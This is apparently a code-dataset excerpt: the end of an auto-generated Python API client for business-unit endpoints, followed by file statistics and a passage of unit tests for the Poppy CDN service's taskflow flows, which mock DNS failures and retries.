            '/api2/v1/businessUnits', 'GET',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='PageDtoBusinessUnitDto',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
    def update_business_unit(self, business_unit_id, **kwargs):  # noqa: E501
        """Edit business unit  # noqa: E501
        # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.update_business_unit(business_unit_id, async_req=True)
        >>> result = thread.get()
        :param async_req bool
        :param int business_unit_id: (required)
        :param BusinessUnitEditDto body:
        :return: BusinessUnitDto
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.update_business_unit_with_http_info(business_unit_id, **kwargs)  # noqa: E501
        else:
            (data) = self.update_business_unit_with_http_info(business_unit_id, **kwargs)  # noqa: E501
            return data
    def update_business_unit_with_http_info(self, business_unit_id, **kwargs):  # noqa: E501
        """Edit business unit  # noqa: E501
        # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.update_business_unit_with_http_info(business_unit_id, async_req=True)
        >>> result = thread.get()
        :param async_req bool
        :param int business_unit_id: (required)
        :param BusinessUnitEditDto body:
        :return: BusinessUnitDto
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['business_unit_id', 'body']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')
        params = locals()
        # Reject any keyword argument this endpoint does not accept.
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method update_business_unit" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'business_unit_id' is set
        if ('business_unit_id' not in params or
                params['business_unit_id'] is None):
            raise ValueError("Missing the required parameter `business_unit_id` when calling `update_business_unit`")  # noqa: E501
        collection_formats = {}
        path_params = {}
        if 'business_unit_id' in params:
            path_params['businessUnitId'] = params['business_unit_id']  # noqa: E501
        query_params = []
        header_params = {}
        form_params = []
        local_var_files = {}
        body_params = None
        if 'body' in params:
            body_params = params['body']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501
        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501
        # Authentication setting
        auth_settings = []  # noqa: E501
        return self.api_client.call_api(
            '/api2/v1/businessUnits/{businessUnitId}', 'PUT',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='BusinessUnitDto',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)
| 39.09542
| 421
| 0.616177
| 2,377
| 20,486
| 5.040387
| 0.087085
| 0.086136
| 0.052583
| 0.030048
| 0.916952
| 0.906853
| 0.896586
| 0.883566
| 0.883566
| 0.869293
| 0
| 0.019589
| 0.294787
| 20,486
| 523
| 422
| 39.170172
| 0.809718
| 0.322171
| 0
| 0.768953
| 0
| 0.01083
| 0.207544
| 0.048756
| 0
| 0
| 0
| 0
| 0
| 1
| 0.039711
| false
| 0
| 0.01444
| 0
| 0.111913
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
469b233ab630f32a917a0e8a280b0be19f38c534
| 54,703
|
py
|
Python
|
tests/unit/distributed_task/taskflow/test_flows.py
|
coolyuvee/poppy
|
49c8ad0973798eb98bfadb7d6a5c73744f334413
|
[
"Apache-2.0"
] | 3
|
2017-07-05T20:09:59.000Z
|
2018-11-27T22:02:57.000Z
|
tests/unit/distributed_task/taskflow/test_flows.py
|
coolyuvee/poppy
|
49c8ad0973798eb98bfadb7d6a5c73744f334413
|
[
"Apache-2.0"
] | 24
|
2017-04-18T15:14:04.000Z
|
2019-03-20T19:09:07.000Z
|
tests/unit/distributed_task/taskflow/test_flows.py
|
coolyuvee/poppy
|
49c8ad0973798eb98bfadb7d6a5c73744f334413
|
[
"Apache-2.0"
] | 8
|
2017-04-03T13:24:27.000Z
|
2021-11-08T20:28:10.000Z
|
# Copyright (c) 2015 Rackspace, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import uuid
import mock
from mock import ANY
from oslo_context import context as context_utils
from taskflow import engines
from poppy.distributed_task.taskflow.flow import create_service
from poppy.distributed_task.taskflow.flow import create_ssl_certificate
from poppy.distributed_task.taskflow.flow import delete_service
from poppy.distributed_task.taskflow.flow import delete_ssl_certificate
from poppy.distributed_task.taskflow.flow import purge_service
from poppy.distributed_task.taskflow.flow import recreate_ssl_certificate
from poppy.distributed_task.taskflow.flow import update_service
from poppy.distributed_task.taskflow.flow import update_service_state
from poppy.distributed_task.taskflow.task import common
from poppy.distributed_task.utils import memoized_controllers
from poppy.model.helpers import domain
from poppy.model.helpers import origin
from poppy.model import service
from poppy.model import ssl_certificate
from tests.unit import base
from tests.unit.manager.default.test_services import MonkeyPatchControllers
class DNSException(Exception):
    """Dummy DNS failure type, referenced by dotted path in mocked responders."""
    pass
class TestFlowRuns(base.TestCase):
def setUp(self):
super(TestFlowRuns, self).setUp()
pyrax_cloud_dns_patcher = mock.patch('pyrax.cloud_dns')
pyrax_cloud_dns_patcher.start()
self.addCleanup(pyrax_cloud_dns_patcher.stop)
pyrax_set_credentials_patcher = mock.patch('pyrax.set_credentials')
pyrax_set_credentials_patcher.start()
self.addCleanup(pyrax_set_credentials_patcher.stop)
cassandra_cluster_patcher = mock.patch('cassandra.cluster.Cluster')
cassandra_cluster_patcher.start()
self.addCleanup(cassandra_cluster_patcher.stop)
self.time_factor = 0.001
self.total_retries = 5
self.dns_exception_responder = [
{
'cdn_provider':
{
'error': 'DNSException',
'error_class': 'tests.unit.distributed_task'
'.taskflow.test_flows.DNSException'
}
}
]
self.dns_responder = [
{
'cdn_provider':
{
'success': 'True',
}
}
]
@staticmethod
def all_controllers():
service_controller, storage_controller = \
memoized_controllers.task_controllers('poppy', 'storage')
service_controller, dns_controller = \
memoized_controllers.task_controllers('poppy', 'dns')
service_controller, ssl_cert_controller = \
memoized_controllers.task_controllers('poppy', 'ssl_certificate')
return service_controller, storage_controller, dns_controller, \
ssl_cert_controller
def dns_exceptions_and_succeed(self):
# NOTE(TheSriram): create a chain of mocked return values,
# to allow for retries, and finally succeed. The last value
# indicating success, is just shown to indicate
# that exceptions were not thrown.
dns_responder_returns = [self.dns_exception_responder * 3]
dns_responder_returns.append(self.dns_responder)
return dns_responder_returns
def dns_exceptions_only(self):
# NOTE(TheSriram): create a chain of mocked return values,
# to allow for retries, and finally fail.
dns_responder_returns = [self.dns_exception_responder * 5]
return dns_responder_returns
@staticmethod
def patch_create_flow(service_controller,
storage_controller, dns_controller):
storage_controller.get_service = mock.Mock()
storage_controller.get_service.return_value = mock.Mock(domains=[])
storage_controller.update_service = mock.Mock()
storage_controller._driver.close_connection = mock.Mock()
service_controller.provider_wrapper.create = mock.Mock()
service_controller.provider_wrapper.create._mock_return_value = []
service_controller._driver = mock.Mock()
service_controller._driver.providers.__getitem__ = mock.Mock()
dns_controller.create = mock.Mock()
dns_controller.create._mock_return_value = []
common.create_log_delivery_container = mock.Mock()
@staticmethod
def patch_update_flow(service_controller,
storage_controller, dns_controller):
storage_controller.get_service = mock.Mock()
storage_controller.update_service = mock.Mock()
storage_controller._driver.close_connection = mock.Mock()
service_controller.provider_wrapper.update = mock.Mock()
service_controller.provider_wrapper.update._mock_return_value = []
service_controller.distributed_task_controller.submit_task = mock.Mock()
service_controller._driver = mock.Mock()
service_controller._driver.providers.__getitem__ = mock.Mock()
dns_controller.update = mock.Mock()
dns_controller.update._mock_return_value = []
common.create_log_delivery_container = mock.Mock()
@staticmethod
def patch_delete_flow(service_controller,
storage_controller, dns_controller):
storage_controller.get_service = mock.Mock()
storage_controller.update_service = mock.Mock()
storage_controller.delete_service = mock.Mock()
storage_controller._driver.close_connection = mock.Mock()
service_controller.provider_wrapper.delete = mock.Mock()
service_controller.provider_wrapper.delete._mock_return_value = []
service_controller._driver = mock.Mock()
service_controller._driver.providers.__getitem__ = mock.Mock()
dns_controller.update = mock.Mock()
dns_controller.update._mock_return_value = []
@staticmethod
def patch_purge_flow(service_controller,
storage_controller, dns_controller):
storage_controller.get_service = mock.Mock()
storage_controller.update_service = mock.Mock()
storage_controller.delete_service = mock.Mock()
storage_controller._driver.close_connection = mock.Mock()
service_controller.provider_wrapper.purge = mock.Mock()
service_controller.provider_wrapper.purge._mock_return_value = []
service_controller._driver = mock.Mock()
service_controller._driver.providers.__getitem__ = mock.Mock()
@staticmethod
def patch_service_state_flow(service_controller,
storage_controller, dns_controller):
storage_controller.update_state = mock.Mock()
dns_controller.enable = mock.Mock()
dns_controller.enable._mock_return_value = []
dns_controller.disable = mock.Mock()
dns_controller.disable._mock_return_value = []
@staticmethod
def patch_create_ssl_certificate_flow(service_controller,
storage_controller, dns_controller):
storage_controller.get = mock.Mock()
storage_controller.update = mock.Mock()
storage_controller._driver.close_connection = mock.Mock()
service_controller.provider_wrapper.create_certificate = mock.Mock()
service_controller.provider_wrapper.create_certificate.\
_mock_return_value = []
service_controller._driver = mock.Mock()
service_controller._driver.providers.__getitem__ = mock.Mock()
service_controller._driver.notification = [mock.Mock()]
dns_controller.create = mock.Mock()
dns_controller.create._mock_return_value = []
common.create_log_delivery_container = mock.Mock()
@staticmethod
def patch_delete_ssl_certificate_flow(
service_controller,
storage_controller,
dns_controller,
ssl_cert_controller
):
storage_controller.get = mock.Mock()
storage_controller.update = mock.Mock()
ssl_cert_controller.storage.delete_certificate = mock.Mock()
storage_controller._driver.close_connection = mock.Mock()
service_controller.provider_wrapper.delete_certificate = mock.Mock()
service_controller.provider_wrapper.delete_certificate.\
_mock_return_value = []
service_controller._driver = mock.Mock()
service_controller._driver.providers.__getitem__ = mock.Mock()
service_controller._driver.notification = [mock.Mock()]
dns_controller.create = mock.Mock()
dns_controller.create._mock_return_value = []
common.create_log_delivery_container = mock.Mock()
@staticmethod
def patch_delete_ssl_certificate_retry_flow(
service_controller,
storage_controller,
dns_controller,
ssl_cert_controller
):
storage_controller.get = mock.Mock()
storage_controller.update = mock.Mock()
ssl_cert_controller.storage.delete_certificate = mock.Mock()
storage_controller._driver.close_connection = mock.Mock()
service_controller.provider_wrapper.delete_certificate = mock.Mock()
service_controller.provider_wrapper.delete_certificate. \
_mock_return_value = {
"cdn_provider": {
'error': "",
'error_detail': ""
}
}
service_controller._driver = mock.Mock()
service_controller._driver.providers.__getitem__ = mock.Mock()
service_controller._driver.notification = [mock.Mock()]
dns_controller.create = mock.Mock()
dns_controller.create._mock_return_value = []
common.create_log_delivery_container = mock.Mock()
@staticmethod
def patch_recreate_ssl_certificate_flow(
service_controller, storage_controller, dns_controller):
storage_controller.get = mock.Mock()
storage_controller.update = mock.Mock()
storage_controller._driver.close_connection = mock.Mock()
service_controller.provider_wrapper.create_certificate = mock.Mock()
service_controller.provider_wrapper.create_certificate.\
_mock_return_value = []
service_controller._driver = mock.Mock()
service_controller._driver.providers.__getitem__ = mock.Mock()
service_controller._driver.notification = [mock.Mock()]
dns_controller.create = mock.Mock()
dns_controller.create._mock_return_value = []
common.create_log_delivery_container = mock.Mock()
def test_create_flow_normal(self):
providers = ['cdn_provider']
kwargs = {
'providers_list_json': json.dumps(providers),
'project_id': json.dumps(str(uuid.uuid4())),
'auth_token': json.dumps(str(uuid.uuid4())),
'service_id': json.dumps(str(uuid.uuid4())),
'time_seconds': [i * self.time_factor
for i in range(self.total_retries)],
'context_dict': context_utils.RequestContext().to_dict()
}
(
service_controller,
storage_controller,
dns_controller,
ssl_cert_controller
) = self.all_controllers()
with MonkeyPatchControllers(service_controller,
dns_controller,
storage_controller,
ssl_cert_controller,
memoized_controllers.task_controllers):
self.patch_create_flow(service_controller,
storage_controller,
dns_controller)
engines.run(create_service.create_service(), store=kwargs)
def test_update_flow_normal(self):
service_id = str(uuid.uuid4())
domains_old = domain.Domain(domain='cdn.poppy.org')
domains_new = domain.Domain(domain='mycdn.poppy.org')
current_origin = origin.Origin(origin='poppy.org')
service_old = service.Service(service_id=service_id,
name='poppy cdn service',
domains=[domains_old],
origins=[current_origin],
flavor_id='cdn')
service_new = service.Service(service_id=service_id,
name='poppy cdn service',
domains=[domains_new],
origins=[current_origin],
flavor_id='cdn')
kwargs = {
'project_id': json.dumps(str(uuid.uuid4())),
'auth_token': json.dumps(str(uuid.uuid4())),
'service_id': json.dumps(service_id),
'time_seconds': [i * self.time_factor
for i in range(self.total_retries)],
'service_old': json.dumps(service_old.to_dict()),
'service_obj': json.dumps(service_new.to_dict()),
'context_dict': context_utils.RequestContext().to_dict()
}
(
service_controller,
storage_controller,
dns_controller,
ssl_cert_controller
) = self.all_controllers()
with MonkeyPatchControllers(service_controller,
dns_controller,
storage_controller,
ssl_cert_controller,
memoized_controllers.task_controllers):
self.patch_update_flow(service_controller, storage_controller,
dns_controller)
engines.run(update_service.update_service(), store=kwargs)
def test_delete_flow_normal(self):
service_id = str(uuid.uuid4())
domains_old = domain.Domain(domain='cdn.poppy.org')
current_origin = origin.Origin(origin='poppy.org')
service_obj = service.Service(service_id=service_id,
name='poppy cdn service',
domains=[domains_old],
origins=[current_origin],
flavor_id='cdn')
kwargs = {
'project_id': json.dumps(str(uuid.uuid4())),
'service_id': json.dumps(service_id),
'time_seconds': [i * self.time_factor for
i in range(self.total_retries)],
'provider_details': json.dumps(
dict([(k, v.to_dict())
for k, v in service_obj.provider_details.items()])),
'context_dict': context_utils.RequestContext().to_dict()
}
(
service_controller,
storage_controller,
dns_controller,
ssl_cert_controller
) = self.all_controllers()
with MonkeyPatchControllers(service_controller,
dns_controller,
storage_controller,
ssl_cert_controller,
memoized_controllers.task_controllers):
self.patch_delete_flow(service_controller, storage_controller,
dns_controller)
storage_controller.get_service = mock.Mock(
return_value=service_obj)
engines.run(delete_service.delete_service(), store=kwargs)
def test_purge_flow_normal(self):
service_id = str(uuid.uuid4())
domains_old = domain.Domain(domain='cdn.poppy.org')
current_origin = origin.Origin(origin='poppy.org')
service_obj = service.Service(service_id=service_id,
name='poppy cdn service',
domains=[domains_old],
origins=[current_origin],
flavor_id='cdn')
kwargs = {
'project_id': json.dumps(str(uuid.uuid4())),
'service_id': json.dumps(service_id),
'provider_details': json.dumps(
dict([(k, v.to_dict())
for k, v in service_obj.provider_details.items()])),
'purge_url': 'cdn.poppy.org',
'hard': json.dumps(True),
'service_obj': json.dumps(service_obj.to_dict()),
'context_dict': context_utils.RequestContext().to_dict()
}
(
service_controller,
storage_controller,
dns_controller,
ssl_cert_controller
) = self.all_controllers()
with MonkeyPatchControllers(service_controller,
dns_controller,
storage_controller,
ssl_cert_controller,
memoized_controllers.task_controllers):
self.patch_purge_flow(service_controller, storage_controller,
dns_controller)
engines.run(purge_service.purge_service(), store=kwargs)
def test_service_state_flow_normal(self):
service_id = str(uuid.uuid4())
domains_old = domain.Domain(domain='cdn.poppy.org')
current_origin = origin.Origin(origin='poppy.org')
service_obj = service.Service(service_id=service_id,
name='poppy cdn service',
domains=[domains_old],
origins=[current_origin],
flavor_id='cdn')
enable_kwargs = {
'project_id': json.dumps(str(uuid.uuid4())),
'state': 'enable',
'service_obj': json.dumps(service_obj.to_dict()),
'time_seconds': [i * self.time_factor for
i in range(self.total_retries)],
'context_dict': context_utils.RequestContext().to_dict()
}
disable_kwargs = enable_kwargs.copy()
disable_kwargs['state'] = 'disable'
(
service_controller,
storage_controller,
dns_controller,
ssl_cert_controller
) = self.all_controllers()
with MonkeyPatchControllers(service_controller,
dns_controller,
storage_controller,
ssl_cert_controller,
memoized_controllers.task_controllers):
self.patch_service_state_flow(service_controller,
storage_controller,
dns_controller)
engines.run(update_service_state.enable_service(),
store=enable_kwargs)
engines.run(update_service_state.disable_service(),
store=disable_kwargs)
def test_create_flow_dns_exception(self):
providers = ['cdn_provider']
kwargs = {
'providers_list_json': json.dumps(providers),
'project_id': json.dumps(str(uuid.uuid4())),
'auth_token': json.dumps(str(uuid.uuid4())),
'service_id': json.dumps(str(uuid.uuid4())),
'time_seconds': [i * self.time_factor for
i in range(self.total_retries)],
'context_dict': context_utils.RequestContext().to_dict()
}
(
service_controller,
storage_controller,
dns_controller,
ssl_cert_controller
) = self.all_controllers()
with MonkeyPatchControllers(service_controller,
dns_controller,
storage_controller,
ssl_cert_controller,
memoized_controllers.task_controllers):
self.patch_create_flow(service_controller, storage_controller,
dns_controller)
dns_controller.create = mock.Mock()
dns_controller.create._mock_return_value = {
'cdn_provider': {
'error': 'Whoops!',
'error_class': 'tests.unit.distributed_task'
'.taskflow.test_flows.DNSException'
}
}
engines.run(create_service.create_service(), store=kwargs)
def test_update_flow_dns_exception(self):
service_id = str(uuid.uuid4())
domains_old = domain.Domain(domain='cdn.poppy.org')
domains_new = domain.Domain(domain='mycdn.poppy.org')
current_origin = origin.Origin(origin='poppy.org')
service_old = service.Service(service_id=service_id,
name='poppy cdn service',
domains=[domains_old],
origins=[current_origin],
flavor_id='cdn')
service_new = service.Service(service_id=service_id,
name='poppy cdn service',
domains=[domains_new],
origins=[current_origin],
flavor_id='cdn')
kwargs = {
'project_id': json.dumps(str(uuid.uuid4())),
'auth_token': json.dumps(str(uuid.uuid4())),
'service_id': json.dumps(service_id),
'time_seconds': [i * self.time_factor for
i in range(self.total_retries)],
'service_old': json.dumps(service_old.to_dict()),
'service_obj': json.dumps(service_new.to_dict()),
'context_dict': context_utils.RequestContext().to_dict()
}
(
service_controller,
storage_controller,
dns_controller,
ssl_cert_controller
) = self.all_controllers()
with MonkeyPatchControllers(service_controller,
dns_controller,
storage_controller,
ssl_cert_controller,
memoized_controllers.task_controllers):
self.patch_update_flow(service_controller, storage_controller,
dns_controller)
dns_controller.update = mock.Mock()
dns_controller.update._mock_return_value = {
'cdn_provider': {
'error': 'Whoops!',
'error_class': 'tests.unit.distributed_task'
'.taskflow.test_flows.DNSException'
}
}
engines.run(update_service.update_service(), store=kwargs)
def test_delete_flow_dns_exception(self):
service_id = str(uuid.uuid4())
domains_old = domain.Domain(domain='cdn.poppy.org')
current_origin = origin.Origin(origin='poppy.org')
service_obj = service.Service(service_id=service_id,
name='poppy cdn service',
domains=[domains_old],
origins=[current_origin],
flavor_id='cdn')
kwargs = {
'project_id': json.dumps(str(uuid.uuid4())),
'service_id': json.dumps(service_id),
'time_seconds': [i * self.time_factor for
i in range(self.total_retries)],
'provider_details': json.dumps(
dict([(k, v.to_dict())
for k, v in service_obj.provider_details.items()])),
'context_dict': context_utils.RequestContext().to_dict()
}
(
service_controller,
storage_controller,
dns_controller,
ssl_cert_controller
) = self.all_controllers()
with MonkeyPatchControllers(service_controller,
dns_controller,
storage_controller,
ssl_cert_controller,
memoized_controllers.task_controllers):
self.patch_delete_flow(service_controller, storage_controller,
dns_controller)
service_mock = mock.Mock()
type(service_mock).domains = []
storage_controller.get_service.return_value = service_mock
dns_controller.delete = mock.Mock()
dns_controller.delete._mock_return_value = {
'cdn_provider': {
'error': 'Whoops!',
'error_class': 'tests.unit.distributed_task'
'.taskflow.test_flows.DNSException'
}
}
engines.run(delete_service.delete_service(), store=kwargs)
def test_service_state_flow_dns_exception(self):
service_id = str(uuid.uuid4())
domains_old = domain.Domain(domain='cdn.poppy.org')
current_origin = origin.Origin(origin='poppy.org')
service_obj = service.Service(service_id=service_id,
name='poppy cdn service',
domains=[domains_old],
origins=[current_origin],
flavor_id='cdn')
enable_kwargs = {
'project_id': json.dumps(str(uuid.uuid4())),
'state': 'enable',
'service_obj': json.dumps(service_obj.to_dict()),
'time_seconds': [i * self.time_factor for
i in range(self.total_retries)],
'context_dict': context_utils.RequestContext().to_dict()
}
disable_kwargs = enable_kwargs.copy()
disable_kwargs['state'] = 'disable'
(
service_controller,
storage_controller,
dns_controller,
ssl_cert_controller
) = self.all_controllers()
with MonkeyPatchControllers(service_controller,
dns_controller,
storage_controller,
ssl_cert_controller,
memoized_controllers.task_controllers):
self.patch_service_state_flow(service_controller,
storage_controller,
dns_controller)
dns_controller.enable = mock.Mock()
dns_controller.enable._mock_return_value = {
'cdn_provider': {
'error': 'Whoops!',
'error_class': 'tests.unit.distributed_task'
'.taskflow.test_flows.DNSException'
}
}
dns_controller.disable = mock.Mock()
dns_controller.disable._mock_return_value = {
'cdn_provider': {
'error': 'Whoops!',
'error_class': 'tests.unit.distributed_task'
'.taskflow.test_flows.DNSException'
}
}
engines.run(update_service_state.enable_service(),
store=enable_kwargs)
engines.run(update_service_state.disable_service(),
store=disable_kwargs)
def test_update_flow_dns_exception_with_retry_and_succeed(self):
service_id = str(uuid.uuid4())
domains_old = domain.Domain(domain='cdn.poppy.org')
domains_new = domain.Domain(domain='mycdn.poppy.org')
current_origin = origin.Origin(origin='poppy.org')
service_old = service.Service(service_id=service_id,
name='poppy cdn service',
domains=[domains_old],
origins=[current_origin],
flavor_id='cdn')
service_new = service.Service(service_id=service_id,
name='poppy cdn service',
domains=[domains_new],
origins=[current_origin],
flavor_id='cdn')
kwargs = {
'project_id': json.dumps(str(uuid.uuid4())),
'auth_token': json.dumps(str(uuid.uuid4())),
'service_id': json.dumps(service_id),
'time_seconds': [i * self.time_factor for
i in range(self.total_retries)],
'service_old': json.dumps(service_old.to_dict()),
'service_obj': json.dumps(service_new.to_dict()),
'context_dict': context_utils.RequestContext().to_dict()
}
(
service_controller,
storage_controller,
dns_controller,
ssl_cert_controller
) = self.all_controllers()
with MonkeyPatchControllers(service_controller,
dns_controller,
storage_controller,
ssl_cert_controller,
memoized_controllers.task_controllers):
self.patch_update_flow(service_controller, storage_controller,
dns_controller)
dns_controller.update = mock.Mock()
dns_responder_returns = self.dns_exceptions_and_succeed()
dns_controller.update._mock_side_effect = (dns_responder for
dns_responder in
dns_responder_returns)
engines.run(update_service.update_service(), store=kwargs)
def test_update_flow_dns_exception_with_retry_and_fail(self):
service_id = str(uuid.uuid4())
domains_old = domain.Domain(domain='cdn.poppy.org')
domains_new = domain.Domain(domain='mycdn.poppy.org')
current_origin = origin.Origin(origin='poppy.org')
service_old = service.Service(service_id=service_id,
name='poppy cdn service',
domains=[domains_old],
origins=[current_origin],
flavor_id='cdn')
service_new = service.Service(service_id=service_id,
name='poppy cdn service',
domains=[domains_new],
origins=[current_origin],
flavor_id='cdn')
kwargs = {
'project_id': json.dumps(str(uuid.uuid4())),
'auth_token': json.dumps(str(uuid.uuid4())),
'service_id': json.dumps(service_id),
'time_seconds': [i * self.time_factor for
i in range(self.total_retries)],
'service_old': json.dumps(service_old.to_dict()),
'service_obj': json.dumps(service_new.to_dict()),
'context_dict': context_utils.RequestContext().to_dict()
}
(
service_controller,
storage_controller,
dns_controller,
ssl_cert_controller
) = self.all_controllers()
with MonkeyPatchControllers(service_controller,
dns_controller,
storage_controller,
ssl_cert_controller,
memoized_controllers.task_controllers):
self.patch_update_flow(service_controller, storage_controller,
dns_controller)
dns_controller.update = mock.Mock()
dns_responder_returns = self.dns_exceptions_only()
dns_controller.update._mock_side_effect = (dns_responder for
dns_responder in
dns_responder_returns)
engines.run(update_service.update_service(), store=kwargs)
def test_create_flow_dns_exception_with_retry_and_succeed(self):
providers = ['cdn_provider']
kwargs = {
'providers_list_json': json.dumps(providers),
'project_id': json.dumps(str(uuid.uuid4())),
'auth_token': json.dumps(str(uuid.uuid4())),
'service_id': json.dumps(str(uuid.uuid4())),
'time_seconds': [i * self.time_factor for
i in range(self.total_retries)],
'context_dict': context_utils.RequestContext().to_dict()
}
(
service_controller,
storage_controller,
dns_controller,
ssl_cert_controller
) = self.all_controllers()
with MonkeyPatchControllers(service_controller,
dns_controller,
storage_controller,
ssl_cert_controller,
memoized_controllers.task_controllers):
self.patch_create_flow(service_controller, storage_controller,
dns_controller)
dns_controller.create = mock.Mock()
dns_responder_returns = self.dns_exceptions_and_succeed()
dns_controller.create._mock_side_effect = (dns_responder for
dns_responder in
dns_responder_returns)
engines.run(create_service.create_service(), store=kwargs)
def test_create_flow_dns_exception_with_retry_and_fail(self):
providers = ['cdn_provider']
kwargs = {
'providers_list_json': json.dumps(providers),
'project_id': json.dumps(str(uuid.uuid4())),
'auth_token': json.dumps(str(uuid.uuid4())),
'service_id': json.dumps(str(uuid.uuid4())),
'time_seconds': [i * self.time_factor for
i in range(self.total_retries)],
'context_dict': context_utils.RequestContext().to_dict()
}
(
service_controller,
storage_controller,
dns_controller,
ssl_cert_controller
) = self.all_controllers()
with MonkeyPatchControllers(service_controller,
dns_controller,
storage_controller,
ssl_cert_controller,
memoized_controllers.task_controllers):
self.patch_create_flow(service_controller, storage_controller,
dns_controller)
dns_controller.create = mock.Mock()
dns_responder_returns = self.dns_exceptions_only()
dns_controller.create._mock_side_effect = (dns_responder for
dns_responder in
dns_responder_returns)
engines.run(create_service.create_service(), store=kwargs)
def test_delete_flow_dns_exception_with_retry_and_succeed(self):
service_id = str(uuid.uuid4())
domains_old = domain.Domain(domain='cdn.poppy.org')
current_origin = origin.Origin(origin='poppy.org')
service_obj = service.Service(service_id=service_id,
name='poppy cdn service',
domains=[domains_old],
origins=[current_origin],
flavor_id='cdn')
kwargs = {
'project_id': json.dumps(str(uuid.uuid4())),
'service_id': json.dumps(service_id),
'time_seconds': [i * self.time_factor for
i in range(self.total_retries)],
'provider_details': json.dumps(
dict([(k, v.to_dict())
for k, v in service_obj.provider_details.items()])),
'context_dict': context_utils.RequestContext().to_dict()
}
(
service_controller,
storage_controller,
dns_controller,
ssl_cert_controller
) = self.all_controllers()
with MonkeyPatchControllers(service_controller,
dns_controller,
storage_controller,
ssl_cert_controller,
memoized_controllers.task_controllers):
self.patch_delete_flow(service_controller, storage_controller,
dns_controller)
dns_controller.delete = mock.Mock()
dns_responder_returns = self.dns_exceptions_and_succeed()
dns_controller.delete._mock_side_effect = (dns_responder for
dns_responder in
dns_responder_returns)
engines.run(delete_service.delete_service(), store=kwargs)
def test_delete_flow_dns_exception_with_retry_and_fail(self):
service_id = str(uuid.uuid4())
domains_old = domain.Domain(domain='cdn.poppy.org')
current_origin = origin.Origin(origin='poppy.org')
service_obj = service.Service(service_id=service_id,
name='poppy cdn service',
domains=[domains_old],
origins=[current_origin],
flavor_id='cdn')
kwargs = {
'project_id': json.dumps(str(uuid.uuid4())),
'service_id': json.dumps(service_id),
'time_seconds': [i * self.time_factor for
i in range(self.total_retries)],
'provider_details': json.dumps(
dict([(k, v.to_dict())
for k, v in service_obj.provider_details.items()])),
'context_dict': context_utils.RequestContext().to_dict()
}
(
service_controller,
storage_controller,
dns_controller,
ssl_cert_controller
) = self.all_controllers()
with MonkeyPatchControllers(service_controller,
dns_controller,
storage_controller,
ssl_cert_controller,
memoized_controllers.task_controllers):
self.patch_delete_flow(service_controller, storage_controller,
dns_controller)
dns_controller.delete = mock.Mock()
dns_responder_returns = self.dns_exceptions_only()
dns_controller.delete._mock_side_effect = (dns_responder for
dns_responder in
dns_responder_returns)
engines.run(delete_service.delete_service(), store=kwargs)
def test_service_state_flow_dns_exception_retry_and_succeed(self):
service_id = str(uuid.uuid4())
domains_old = domain.Domain(domain='cdn.poppy.org')
current_origin = origin.Origin(origin='poppy.org')
service_obj = service.Service(service_id=service_id,
name='poppy cdn service',
domains=[domains_old],
origins=[current_origin],
flavor_id='cdn')
enable_kwargs = {
'project_id': json.dumps(str(uuid.uuid4())),
'state': 'enable',
'service_obj': json.dumps(service_obj.to_dict()),
'time_seconds': [i * self.time_factor for
i in range(self.total_retries)],
'context_dict': context_utils.RequestContext().to_dict()
}
disable_kwargs = enable_kwargs.copy()
disable_kwargs['state'] = 'disable'
(
service_controller,
storage_controller,
dns_controller,
ssl_cert_controller
) = self.all_controllers()
with MonkeyPatchControllers(service_controller,
dns_controller,
storage_controller,
ssl_cert_controller,
memoized_controllers.task_controllers):
self.patch_service_state_flow(service_controller,
storage_controller,
dns_controller)
dns_responder_returns = self.dns_exceptions_and_succeed()
dns_controller.enable._mock_side_effect = (dns_responder for
dns_responder in
dns_responder_returns)
dns_controller.disable._mock_side_effect = (dns_responder for
dns_responder in
dns_responder_returns)
engines.run(update_service_state.enable_service(),
store=enable_kwargs)
engines.run(update_service_state.disable_service(),
store=disable_kwargs)
def test_service_state_flow_dns_exception_retry_and_fail(self):
service_id = str(uuid.uuid4())
domains_old = domain.Domain(domain='cdn.poppy.org')
current_origin = origin.Origin(origin='poppy.org')
service_obj = service.Service(service_id=service_id,
name='poppy cdn service',
domains=[domains_old],
origins=[current_origin],
flavor_id='cdn')
enable_kwargs = {
'project_id': json.dumps(str(uuid.uuid4())),
'state': 'enable',
'service_obj': json.dumps(service_obj.to_dict()),
'time_seconds': [i * self.time_factor for
i in range(self.total_retries)],
